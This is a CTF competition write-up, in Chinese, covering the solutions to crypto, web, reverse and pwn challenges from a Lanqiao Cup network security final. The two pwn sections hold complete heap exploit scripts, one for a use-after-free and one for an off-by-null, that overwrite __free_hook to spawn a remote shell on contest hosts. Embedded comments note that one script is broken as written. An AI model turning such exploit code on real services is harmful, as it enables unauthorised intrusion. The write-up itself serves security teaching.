第二届蓝桥杯网络安全春秋赛决赛WP | 风尘孤狼

第二届蓝桥杯网络安全春秋赛决赛WP

image-20240602152523609

Sqldata

打开附件,发现是SQL注入流量,最后三个流量读取了flag

image-20240602150744540 image-20240602150757475

去除冗余数据,base32解码即可得到flag

image-20240602150818345

其他两段同理

image-20240602150834608 image-20240602150847599

得到flag

flag{a0d78ce4-8072-4e14-939b-cd78392a34f4}

orsa

RSA解密,p^q利用剪枝算法来反求出pq的具体值

import sys
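def search_pq(p, q, modulus=None, xor_bits=None, bits=1024):
    """Depth-first prefix search for the two factors of ``modulus``.

    ``p`` and ``q`` are binary-string prefixes (MSB first, one bit added per
    recursion level).  ``xor_bits`` is the bit string of ``p ^ q`` left-padded
    to ``bits`` characters; at depth ``l`` its ``l``-th character decides
    whether the next bit of ``p`` and ``q`` is equal ("0") or different ("1").
    A prefix pair is abandoned as soon as it can no longer reach ``modulus``:
    the all-zeros completion already exceeds it, the all-ones completion falls
    short of it, or the ``p >= q`` ordering (which removes the mirrored
    duplicate solution) is violated.

    ``modulus`` and ``xor_bits`` default to the module-level ``n`` and ``a1``
    so the original call ``search_pq(p, q)`` keeps working.

    Returns a list of ``(p, q)`` integer pairs whose product is ``modulus``;
    each pair is also printed, one number per line, as before.  Recursion
    depth reaches ``bits``, so the caller must raise the interpreter's
    recursion limit for 1024-bit inputs.
    """
    if modulus is None:
        modulus = n
    if xor_bits is None:
        xor_bits = a1
    depth = len(p)
    remaining = bits - depth
    p_low = int(p + "0" * remaining, 2)
    q_low = int(q + "0" * remaining, 2)
    # Ordering constraint first, then the lower bound of the product.
    if p_low < q_low:
        return []
    if p_low * q_low > modulus:
        return []
    p_high = int(p + "1" * remaining, 2)
    q_high = int(q + "1" * remaining, 2)
    if p_high * q_high < modulus:
        return []
    if depth == bits:
        # No padding is left, so both bounds coincide and the two checks above
        # guarantee p_low * q_low == modulus.
        print(p_low)
        print(q_low)
        return [(p_low, q_low)]
    found = []
    if xor_bits[depth] == "1":
        found += search_pq(p + "1", q + "0", modulus, xor_bits, bits)
        found += search_pq(p + "0", q + "1", modulus, xor_bits, bits)
    else:
        found += search_pq(p + "0", q + "0", modulus, xor_bits, bits)
        found += search_pq(p + "1", q + "1", modulus, xor_bits, bits)
    return found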


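n = 17626392212279375795672017937809976432819563702015014286064950438576962829301599887424832742209378051687822421703316130192020970941676594734073337248659576926575409659609517516571173738767919910420753227081676651612998092451924002173008602428197941864705971469948068681614565308570894501692597579202715649837935866803849514492857112054684416002104812289864567355883456430042148145799939586951625034025707736407538180102611049391900268512837878848560854682228074168583637013599117615137668041018375469762511166636852906124939919673060420023287056647653925858064479788117341253962554259945839612998710315288660915390543
pq = 89884656743115795386465259394234594567546130199363180708002290807487206865805972417279697354950018128772500146302322028511803484668179089220615193364070482772703954931838536681720469410883560665407216805250546708783249336389502139655454481491246187888957907623426449041503701395627092371546762192998918782974
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
e = 65537

# search_pq recurses once per bit of the 1024-bit factors, which is deeper
# than Python's default limit of 1000.
sys.setrecursionlimit(1500)
# Bit string of p ^ q, left-padded to the full factor width.  Both primes have
# their top bit set, so the top bit of the xor is 0; zfill keeps the length at
# exactly 1024 even when further leading bits of p and q coincide, where
# "0" + bin(pq)[2:] would come up short and search_pq would index past the end.
a1 = bin(pq)[2:].zfill(1024)


# Both factors start with a 1 bit.
p = "1"
q = "1"
search_pq(p, q)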

得到p和q

p=158320041595963346910607953497511695075001758433674691713888017753105291655382379900703870377303844238937087600854108033755563228292880298246860058356388698143578740680103975150537695645088531644826282534286488017240804391039495063039781633438590238645412596002890423433811285116929743283890906195989612887623
 q=111333928633384039248787825266058380102564302610683774296735138323796885440325522301302649130522397716710525859927661834447462648801231320790381330762200244351951324675928016721869115489370317719639192101136412298885878342628245496531456558511102222180443848548963347176474520255844896524252794434180745626041

然后正常RSA解密即可得到flag

from Crypto.Util.number import *
# Factors recovered by the pruning search above; from here it is textbook RSA.
p = 158320041595963346910607953497511695075001758433674691713888017753105291655382379900703870377303844238937087600854108033755563228292880298246860058356388698143578740680103975150537695645088531644826282534286488017240804391039495063039781633438590238645412596002890423433811285116929743283890906195989612887623
q = 111333928633384039248787825266058380102564302610683774296735138323796885440325522301302649130522397716710525859927661834447462648801231320790381330762200244351951324675928016721869115489370317719639192101136412298885878342628245496531456558511102222180443848548963347176474520255844896524252794434180745626041
e = 65537
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
n = p * q
phi = (p - 1) * (q - 1)

# Private exponent e^-1 mod phi; pow() with exponent -1 is the built-in
# equivalent of Crypto's inverse().
d = pow(e, -1, phi)
_m_int = pow(c, d, n)
# Minimal-width big-endian bytes, at least one byte, matching long_to_bytes().
m = _m_int.to_bytes(max(1, (_m_int.bit_length() + 7) // 8), "big")
print(m)
image-20240602150953572

flag{2c50b32a-fe84-4f1f-a645-22dcc4caa9b9}

0x100

nc得到源码

image-20240602151020457

发现flag部分数据丢失,利用明文m的高位攻击来恢复

同时需要res = f.small_roots(X = 256^i,beta=0.48)

脚本如下

from Crypto.Util.number import *
from gmpy2 import *

c = 33555838736521638336508564179240154875721919208162692653621849617985366203999316090924212552099132840976315135821908280824203158812899702896949214723368112127500471190187443464058193634562219092511168113924749082876766345406995267519131355826704095496960006139716868408593517285137109832742755581112433110173
n = 74224694190378245570662914514197080111808324634781677418701441263524880254209023098028414752153116247558921852342579052620848368822288495663953364161190265839271585860352129564216547402136600849476321773029405114130903399735699724437227139229796496995834686374625593947966539751536221128712735603857178093087
e = 3

# The ring and its generator do not depend on the loop variable; build once.
R = PolynomialRing(Zmod(n), 'x')
x = R.gen()

# Try every plausible number of unknown bytes between "flag{" and "}".
for i in range(100):
    dm = b"flag{" + b"\x00" * i + b"}"
    # Zero padding up to the width the original solve used (114514 bytes).
    pad = b"\x00" * (114514 - len(dm))
    # The unknown bytes sit just above the closing brace and the padding.
    shift = 256 ** (len(pad) + 1)

    mhigh = bytes_to_long(dm + pad)
    f = ((mhigh + x * shift) ** e - c).monic()

    res = f.small_roots(X=256**i, beta=0.48)
    print(res)

    if res:
        flag = mhigh + int(res[0]) * shift
        print(long_to_bytes(int(flag))[:43])

image-20240602151050617

得到flag

flag{8de8cc07-2ca0-48fd-a13e-1ac1d0b38743}

babyheap

image-20240602151114050

存在UAF漏洞

from pwn import *

# "babyheap" solve script.  The writeup attributes the bug to a use-after-free
# (UAF): judging by the menu choices sent below, option 1 allocates, 2 frees,
# 3 edits and 4 shows, and an index stays usable after it has been freed.
# Reviewer notes, from the defender's side:
#   * The service-side fix is to invalidate a slot on free (clear the pointer
#     and reject the index) so that edit/show can never reach freed memory.
#   * The libc leak and the final write rely on glibc exporting
#     __malloc_hook/__free_hook; glibc 2.34 removed those hooks, so this path
#     is specific to the libc.so.6 bundled with the challenge.
#   * Host and port are the contest instance quoted in the writeup.
# Colored status printers (ANSI 256-colour escape sequences).
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')

# log_level='debug' echoes every byte exchanged with the service.
context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.132.99', 21800)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")

# Initial allocations
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "0")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "1")
p.sendlineafter("size: ", "96")

# Hidden menu entry ("555") answered with a value; its effect is not shown in
# the writeup — presumably a challenge-specific helper, confirm against the binary.
p.sendlineafter(">> \n", "555")
p.sendlineafter("find me\n", "1024")

p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "2")
p.sendlineafter("size: ", "96")

# Freeing chunks
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "1")

p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "0")

# Corrupting freed chunk — this edit of an already-freed index is the UAF the
# writeup names.
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "0")
p.send(b'\n')

# Allocating more chunks
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "3")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "4")
p.sendlineafter("size: ", "96")

# Overwriting next chunk's header
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "4")
p.send(p64(0) + p64(0x481) + b'\n')

# Free chunk to merge into top chunk
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "1")

# Leak libc address (show of a freed index; the constants subtracted are the
# offsets the author tuned for the bundled libc).
p.sendlineafter(">> \n", "4")
p.sendlineafter("index: \n", "1")
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
li(hex(libc_base))

# Calculate necessary addresses
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
# NOTE(review): bin_sh is computed but never used; the "/bin/sh" string is
# placed through an allocated chunk further down instead.
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Freeing and corrupting chunks to overwrite free_hook
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "5")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "2")

p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "5")

p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "4")
p.send(p64(0) + p64(0x71) + p64(free_hook) + b'\n')

# Write system address and "/bin/sh" string to chunks
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "6")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "6")
p.send(b'/bin/sh\x00\n')

p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "7")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "7")
p.send(p64(system_addr) + b'\n')

# Trigger exploit
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "6")

p.interactive()
image-20240602151138849

得到flag

flag{5dd4ce7c-da45-434f-be5b-32028500cae9}

backleak

源码泄露,dirsearch扫目录

image-20240602151206221

访问得到提示,vi.php

image-20240602151225491

恢复文件

vim -r index.php.swp

得到源码

<!DOCTYPE html>
<!--
  index.php as recovered from the leaked editor swap file (vim -r
  index.php.swp).  Two disclosure issues are visible in this listing: the
  swap file was left where a directory scan could fetch it, and the routing
  hint at the bottom is shipped to every client as an HTML comment.  Editor
  swap/backup files belong outside the web root (or behind a server rule that
  refuses them), and hints of this kind do not belong in served markup.
-->
<html>
<head>
    <title>backleak</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf8">

    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            height: 100vh;
            margin: 0;
            background: linear-gradient(to bottom left, #fff, #f8f9fa);
            font-family: 'Helvetica Neue', Arial, sans-serif;
            color: #343a40;
        }

        img {
            width: 300px;
            height: 300px;
            border-radius: 50%;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
        }

        h1 {
            font-size: 2em;
            text-shadow: none;
            color: #212529;
            width: 60%;
            word-wrap: break-word;
        }
    </style>
</head>

<body>
    <h1>你知道^M是什么吗?在哪里经常见过呢?</h1>
</body>
<!-- vi.php -->
</html>

访问vi.php,post传参flag=ok,即可得到flag

image-20240602151244203

得到flag

flag{a72b0871-46cc-44b4-a3ab-9559b0ae0370}

gettingstarted

image-20240602151303499

存在OFF BY NULL漏洞

from pwn import *
from ctypes import *

# "gettingstarted" solve script.  The writeup attributes the bug to an
# off-by-null; the 105-byte write into the 104-byte chunk at index 17 below is
# where the extra byte lands.  Reviewer notes, from the defender's side:
#   * Login: the 7-byte token is rand() % 80 + 32 after srand(time(0)),
#     reproduced here with ctypes against the same libc.  Anything a client
#     can regenerate from the wall clock is not authentication; a CSPRNG
#     (getrandom / Python's secrets) would close that hole.
#   * NOTE(review): `libc` is a ctypes CDLL handle, and ctypes resolves
#     attribute access as a symbol lookup, so `libc.sym[...]` and
#     `libc.search(...)` below would raise AttributeError as written.
#     Presumably a pwntools ELF('./libc-2.27.so') under a separate name was
#     intended — confirm before reuse.
#   * __free_hook no longer exists from glibc 2.34 on; this path is specific
#     to the bundled libc-2.27.so.
# Colored status printers (ANSI 256-colour escape sequences).
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')

# log_level='debug' echoes every byte exchanged with the service.
context(os='linux', arch='amd64', log_level='debug')



p = remote('8.147.131.4', 25825)
elf = ELF('./easy')

# Local copy of the service's libc, used only to replay its rand() sequence.
libc = cdll.LoadLibrary('./libc-2.27.so')
# Assumes the service seeds with the current second as well — TODO confirm.
seed = libc.time(0)
libc.srand(seed)


# Seven printable bytes (32..111) in the same order the service derives them.
a = [libc.rand() % 80 + 32 for _ in range(7)]
p.sendlineafter("please login >>>>\n", bytes(a))

for i in range(10):
    p.sendlineafter(":", "1")
    p.sendlineafter("Index: ", str(i))
    p.sendlineafter("Size ", "144")

for i in range(7):
    p.sendlineafter(":", "4")
    p.sendlineafter("Index: ", str(i))

# Leak: the constant subtracted is the offset the author tuned for libc-2.27.
p.sendlineafter(":", "3")
p.sendlineafter("Index: ", "7")
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x3ebd30
li(hex(libc_base))

# See the NOTE(review) at the top: these two lines use pwntools ELF methods on
# a ctypes object.  bin_sh is also never used below.
free_hook = libc_base + libc.sym['__free_hook']
system_addr, bin_sh = libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

for i in range(10):
    p.sendlineafter(":", "1")
    p.sendlineafter("Index: ", str(i + 10))
    p.sendlineafter("Size ", "104")

# 104 bytes of filler plus one extra byte: the off-by-one write the writeup names.
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "17")
p.sendlineafter("Content: ", b'a' * 104 + p8(0xe1))
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "18")
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "19")
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "18")
p.sendlineafter("Size ", "216")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "18")
p.sendlineafter("Content: ", b'a' * 104 + p64(0x71) + p64(free_hook) + b'\n')

p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "27")
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "27")
p.sendlineafter("Content: ", b'/bin/sh\x00\n')

p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "28")
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "28")
p.sendlineafter("Content: ", p64(system_addr) + b'\n')

p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "27")

p.interactive()
image-20240602151327381

flag{e9dc7427-af2d-4d62-8d8c-cc3656de5a2c}

dirty_data

连接SSH之后发现html下存在源码服务

image-20240602151350899

找到mysql账密

mysql_connect('localhost','ctf','ctf123');

连接之后发现存在一串字段是冗余的

image-20240602151407032

删除第四段数据即可

delete from news where id=4;
image-20240602151425305

稍等一会,即可读取flag

image-20240602151440177

flag{655eba17-be43-4142-9630-9562065bb43b}

LFSR

LFSR加密,IDA反编译可以看到加密逻辑

image-20240602151508511

跟进lfsr_cipher函数

image-20240602151521208 image-20240602151531423

逆向一下即可,脚本如下

# Ciphertext bytes lifted from the binary (v5 in the decompiled listing), 42 in total.
v5 = [0x16, 0x54, 0x0FD, 0x29, 0x5C, 0x23, 0x0EA, 0x0A1, 0x56, 0x0D7,
      0x3D, 0x49, 0x72, 0x0A6, 0x0F5, 0x53, 0x0D0, 0x0E9, 0x41, 0x82,
      0x0ED, 0x0D4, 0x42, 0x16, 0x0FC, 0x2F, 0x9F, 0x0B7, 0x44, 0x51,
      0x2B, 0x3C, 0x0E5, 0x0F6, 0x5, 0x89, 0x0ED, 0x0DE, 0x44, 0x0DE,
      0x0BE, 0x93]

# 16-bit register state as initialised by the binary (44257 == 0xACE1); the
# copies mirror the decompiled locals.
v6 = 44257
v7 = v6
a1 = v7


def _lfsr_step(state):
    """Advance the register one step: shift right, and when the bit shifted
    out was 1 fold in the feedback mask 46080 (0xB400)."""
    carry = state & 1
    state >>= 1
    if carry:
        state ^= 46080
    return state


flag = ''
for pos in range(42):
    a1 = _lfsr_step(a1)
    # The low byte of the new state is the keystream byte for this position.
    flag += chr((v5[pos] ^ a1) & 0xff)
    # Echo the partially recovered flag after every round, as the original did.
    print(flag)

得到flag

image-20240602151600024

flag{0ce4feed-01a1-4694-aa8d-e11c5d9522ec}

Ezmaze

迷宫题,有upx壳

image-20240602151621329

改UPX特征然后脱壳,UPX应该都是大写才对

image-20240602151633905 image-20240602151655078

脱壳之后反编译,查看主体逻辑发现地图

101101
101001
100101
110101
100001
111111

分析代码发现移动按键

# The movement keys are stored XOR-ed with 0x32 in the binary; undo that.
wz = [key ^ 0x32 for key in (10, 0, 6, 94)]
print(*map(chr, wz), end=" ")
image-20240602151733662

走出地图

22l22ll8888
image-20240602151751215

md5即为flag

from hashlib import md5

# The route through the maze; its MD5 hex digest is the flag body.
data = "22l22ll8888"

digest = md5(data.encode('utf-8')).hexdigest()
print(f"flag{{{digest}}}")
image-20240602151817316

flag{c534af59b12444af2cefebd25f0efca4}
